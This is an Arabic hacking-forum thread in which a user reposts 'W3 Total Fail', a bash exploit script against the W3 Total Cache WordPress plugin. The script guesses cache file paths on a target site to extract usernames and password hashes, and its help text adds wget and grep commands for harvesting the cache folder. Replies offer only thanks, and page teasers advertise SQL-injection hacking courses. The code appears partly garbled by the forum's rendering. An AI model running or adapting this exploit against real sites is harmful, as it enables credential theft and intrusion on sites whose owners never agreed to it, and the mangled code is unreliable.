1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] Wordpress Remote Exploit - W3 Total Cache

الموضوع في 'آمن المواقع والسيرفرات' بواسطة Hacker-DZ, بتاريخ ‏24 ابريل 2013.

كاتب الموضوع : Hacker-DZ المشاهدات : 1,516 الردود : 5 ‏24 ابريل 2013
حالة الموضوع:
مغلق
  1. غير متصل

    Hacker-DZ
    rank
    Developer

    عضو منذ:
    ‏2 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    Wordpress Remote Exploit - W3 Total Cache


    source

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    كود PHP:
    #!/bin/bash
    # (C) Copyright 2012 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
    #
    # |---------------|
    # | W3 Total Fail |
    # |    by zx2c4   |
    # |---------------|
    #
    # For more info, see built-in help text.
    # exp:w3-total-fail.sh
    #
    # This affects W3 Total Cache <= 0.9.2.4.

    set -f


    printf 
    "\033[1m\033[31m"
    echo "<===== W3 Total Fail =====>"
    echo "<                         >"
    echo "<        by zx2c4         >"
    echo "<                         >"
    echo "<=========================>"
    echo
    echo
    printf "\033[0m\033[1m"
    echo "W3 Total Fail works by attempting to guess SQL queries that might"
    echo "contain important password hashes. It walks through"
    printf "\033[0m"
    echo "     http://\$wordpress/wp-content/w3tc/dbcache/..."
    printf "\033[1m"
    echo "until it's found the right files. If this directory has directory"
    echo "index listings turned on, you might have more luck downloading the"
    echo "entire folder and grepping locally for patterns, like so:"
    printf "\033[0m"
    echo "    \$ wget -np -r http://\$wordpress/wp-content/w3tc/dbcache/"
    echo "    \$ grep -Ra user_pass ."
    printf "\033[1m"
    echo "If directory listings are not available, then this is the tool for"
    echo "you, as it will try to brute force possible w3tc keys. It will try"
    echo "25 user ids and 25 site ids. Adjust the script for more or less range."
    echo
    echo 
    "Enjoy!"
    echo
    echo 
    "- zx2c4"
    echo "Dec 24, 2012"
    echo
    printf "\033[0m"

    printf "\033[0m\033[36m"
    echo "Usage: $0 HOST [URLBASE] [DBPREFIX]"
    echo
    echo 
    "HOST should be the name of the host that is stored by wordpress. It"
    echo "may be the actual host name of the server, or it might be something"
    echo "different, depending on how wordpress is configured."
    echo "Example: blog.zx2c4.com"
    echo
    echo 
    "URLBASE is the base URL of the wordpress blog which are prefixed in"
    echo "forming HTTP requests. If not specified it will default to http://\$HOST"
    echo "Example: http://blog.zx2c4.com or https://someblahblasite.com/my_blog"
    echo
    echo 
    "DBPREFIX is the wordpress prefix used for database table names. It"
    echo "is often \"wp_\", which DBPREFIX defaults to if this argument is"
    echo "unspecified. Some wordpress installations will use an empty prefix,"
    echo "and others use a site-specific prefix. Most, however, will use the"
    echo "default."
    echo "Example: wp_"
    echo
    printf "\033[0m"

    if [ $# -lt 1 ]; then
       
    echo "Error: HOST is a required argument."
       
    exit 1
    fi

    host
    ="$1"
    urlbase="${2:-http://$host}"
    db_prefix="$3"
    [ $# -lt 3 ] && db_prefix="wp_"

    for site_id in {1..250; do for user_id in {1..25}; do
       
    query="SELECT * FROM ${db_prefix}users WHERE ID = '$user_id'"
       
    key="w3tc_${host}_${site_id}_sql_$(echo -n "$query"|md5sum|cut -d ' ' -f 1)"
       
    hash="$(echo -n "$key"|md5sum|cut -d ' ' -f 1)"
       
    hash_path="${hash:0:1}/${hash:1:1}/${hash:2:1}/${hash}"
       
    url="$urlbase/wp-content/w3tc/dbcache/$hash_path"

       
    printf "\033[33m"
       
    echo -"Attempting"
       
    printf "\033[0m"
       
    echo $url..."
        
    curl -"$urltail -+tr -'\n' sed -n  's/.*"user_login";s:[0-9]\+:"\([^"]*\)";s:[0-9]\+:"user_pass";s:[0-9]\+:"\([^"]*\)".*/\x1b[1m\x1b[32mUsername:  \1\nPassword hash: \2\x1b[0m\n/p'

    donedone 
    END__VBULLETIN__CODE__SNIPPET ?>

    video


    [YOUTUBE]sqZ_zYLFDSo[/YOUTUBE]​
     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    ♀GENI RYODAN♀
    rank
    Developer

    عضو منذ:
    ‏7 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    دعـــس المـــلـــغـــمـــيـــن
    الإقامة:

    رد: Wordpress Remote Exploit - W3 Total Cache

    تسلم اخى
    الله يعطيك العافيه
     


  4. غير متصل

    A.R.K.A.N
    DeveloPer Plus

    عضو منذ:
    ‏8 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    15
    نقاط الجائزة:
    الإقامة:

    رد: Wordpress Remote Exploit - W3 Total Cache

    وعليكم السلأم ورحمه الله وبركـأته ,

    مـأشاء الله تبـأرك الله ~

    الله يعطيك العـأفية ~ ومـأننحرم من ابدأعك ~
     


  5. غير متصل

    ADNAN
    Developer

    عضو منذ:
    ‏29 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: Wordpress Remote Exploit - W3 Total Cache

    بارك الله فيك اخي الكريم *:"​
     


  6. غير متصل

    SiL3nT M4n
    rankrank
    Developer

    عضو منذ:
    ‏19 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: Wordpress Remote Exploit - W3 Total Cache

    مميز اخي بارك الله فيك
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...